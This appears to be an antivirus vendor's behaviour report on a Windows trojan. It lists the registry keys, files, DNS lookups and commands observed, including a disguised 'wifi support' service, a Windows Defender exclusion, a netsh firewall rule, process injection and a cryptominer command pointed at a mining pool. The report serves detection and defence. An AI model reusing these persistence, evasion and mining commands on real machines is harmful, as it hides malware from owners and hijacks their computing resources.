Technical Information
To ensure autorun and distribution
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\digehquw] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\digehquw] 'ImagePath' = '%WINDIR%\SysWOW64\digehquw\tvozgocs.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\digehquw] 'ImagePath' = '%WINDIR%\SysWOW64\digehquw\tvozgocs.exe'
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\digehquw' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\tvozgocs.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Moves the following files
- from %TEMP%\tvozgocs.exe to %WINDIR%\syswow64\digehquw\tvozgocs.exe
Deletes itself.
Network activity
TCP
HTTP GET requests
- http://www.google.com/
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK to##to.com
- DNS ASK mi##.zesti.org
- DNS ASK sd##df.it
- DNS ASK mx#.#euto.net
- DNS ASK ma##tim.de
- DNS ASK mx.###oya-door.com
- DNS ASK na###a-door.com
- DNS ASK sa####residency.com
- DNS ASK un#####.x-city.com.ua
- DNS ASK mx######b2d01.pphosted.com
- DNS ASK us.#bm.com
- DNS ASK ho###il.co.uk
- DNS ASK ms#####p-mx2.hinet.net
- DNS ASK ms#.#inet.net
- DNS ASK ih##.org
- DNS ASK mx.#####one.arubamail.it
- DNS ASK mt####.infomaniak.ch
- DNS ASK sq#####ommodities.com
- DNS ASK mx.###gynenet.com
- DNS ASK ur###nenet.com
- DNS ASK mx####.##il.am0.yahoodns.net
- DNS ASK gn###ntech.com
- DNS ASK fp##.mail.dk
- DNS ASK ni####n.tdcadsl.dk
- DNS ASK fi###les.net
- DNS ASK bo####.#reditmailings.com
- DNS ASK cr####mailings.com
- DNS ASK 16#####.mxmail.netease.com
- DNS ASK 16#.com
- DNS ASK re##4.com
- DNS ASK vo##fone.it
- DNS ASK sm###.gov.pe.ca
- DNS ASK co#####rsetcstore.com
- DNS ASK uk.#bm.com
- DNS ASK sk#.com
- DNS ASK gd##.info
- DNS ASK alt1.aspmx.l.google.com
- DNS ASK ya##o.co.in
- DNS ASK mx#####.#ail.gm0.yahoodns.net
- DNS ASK go###email.com
- DNS ASK ni##oir.com
- DNS ASK df##dsfd.it
- DNS ASK wc###ipping.com
- DNS ASK us#.###.mailhostbox.com
- DNS ASK ve###divino.it
- DNS ASK wi####lastic.com
- DNS ASK re#####.cs.interbusiness.it
- DNS ASK ma##.##ionbankph.com
- DNS ASK lu####barriere.com
- DNS ASK wo###online.it
- DNS ASK mx#.#atacomm.ch
- DNS ASK vt##ail.ch
- DNS ASK mx##.gmx.net
- DNS ASK gm#.com
- DNS ASK alt2.aspmx.l.google.com
- DNS ASK eq###edgl.com
- DNS ASK ma##.##tramexgroup.com
- DNS ASK in####exgroup.com
- DNS ASK ma###.esselunga.it
- DNS ASK es###unga.it
- DNS ASK ma##.cvga.de
- DNS ASK cv#a.de
- DNS ASK sp####-canada.com
- DNS ASK mx.##-hpbs.jp
- DNS ASK na######usic-therapy.com
- DNS ASK ms#####.##c.protection.outlook.com
- DNS ASK alt2.gmail-smtp-in.l.google.com
- DNS ASK ms#.com
- DNS ASK mx#.##il.icloud.com
- DNS ASK ti###linet.it
- DNS ASK th##e.cc
- DNS ASK ma##.#ulgaria.com
- DNS ASK in###aldvd.com
- DNS ASK et###.#ail.tiscali.it
- DNS ASK ti##ali.it
- DNS ASK ju##y.it
- DNS ASK id.it
- DNS ASK gmail-smtp-in.l.google.com
- DNS ASK gm##l.com
- DNS ASK mx###.##il.am0.yahoodns.net
- DNS ASK ya##o.co.uk
- DNS ASK ly##s.it
- DNS ASK ho#########.olc.protection.outlook.com
- DNS ASK ma##.#ctboces.org
- DNS ASK ho##ail.com
- DNS ASK fi###magnus.com
- DNS ASK a3#####04.direcpc.com
- DNS ASK di###way.com
- DNS ASK mx.yandex.ru
- DNS ASK yandex.ru
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK ya##o.com
- DNS ASK mi####.bittubeapp.com
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK mx###.in-mx.net
- DNS ASK li##ro.it
- DNS ASK sm####n.libero.it
- DNS ASK es##m.com
- DNS ASK google.com
- DNS ASK at####rs-desmae.com
- DNS ASK mx##.1and1.fr
- DNS ASK bv##.com
- DNS ASK sm##.##cureserver.net
- DNS ASK ma#.com
- DNS ASK di##t.es
- DNS ASK cl######.us.messagelabs.com
- DNS ASK co###o.ziv.es
- DNS ASK di#######stemsandnetwork.com
- DNS ASK aspmx.l.google.com
- DNS ASK sa####riogaray.com
- DNS ASK ma##.##natoriogaray.com
- DNS ASK co##ing.com
- DNS ASK to####.#mail-publisher.com
- DNS ASK sm####.bhnetwork.com
- DNS ASK gr#.com
- DNS ASK sh###ard.com
- DNS ASK ma##.gmail.com
- DNS ASK ho##ail.it
- DNS ASK eu#.###.#rotection.outlook.com
- DNS ASK ho##ail.fr
- DNS ASK wh####oardent.net
- DNS ASK ma##.###uevodiario.com.ni
- DNS ASK el#####diario.com.ni
- DNS ASK ma##.#niitmash.ru
- DNS ASK cn###mash.ru
- DNS ASK mx####.reflexion.net
- DNS ASK nj###ina.com
- DNS ASK mx.##ntent.com
- DNS ASK ec##rs.eu
- DNS ASK te###nfocus.com
- DNS ASK kj#j.it
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\digehquw\tvozgocs.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\digehquw\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\tvozgocs.exe" %WINDIR%\SysWOW64\digehquw\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create digehquw binPath= "%WINDIR%\SysWOW64\digehquw\tvozgocs.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description digehquw "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start digehquw' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\digehquw\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\tvozgocs.exe" %WINDIR%\SysWOW64\digehquw\
- '%WINDIR%\syswow64\sc.exe' create digehquw binPath= "%WINDIR%\SysWOW64\digehquw\tvozgocs.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description digehquw "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start digehquw
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' --algo=cn-heavy/tube -o mining.bittubeapp.com:13333 -u bs3SR4afw4CJsq2dWvisbAWdDfFLcj88bav7nt1bjojpjUVedMEXXXcPiB27hV3RJMVmSBdfq4vs6PHDcG5uTSoj2oiWF2UKB.70000 -p x -k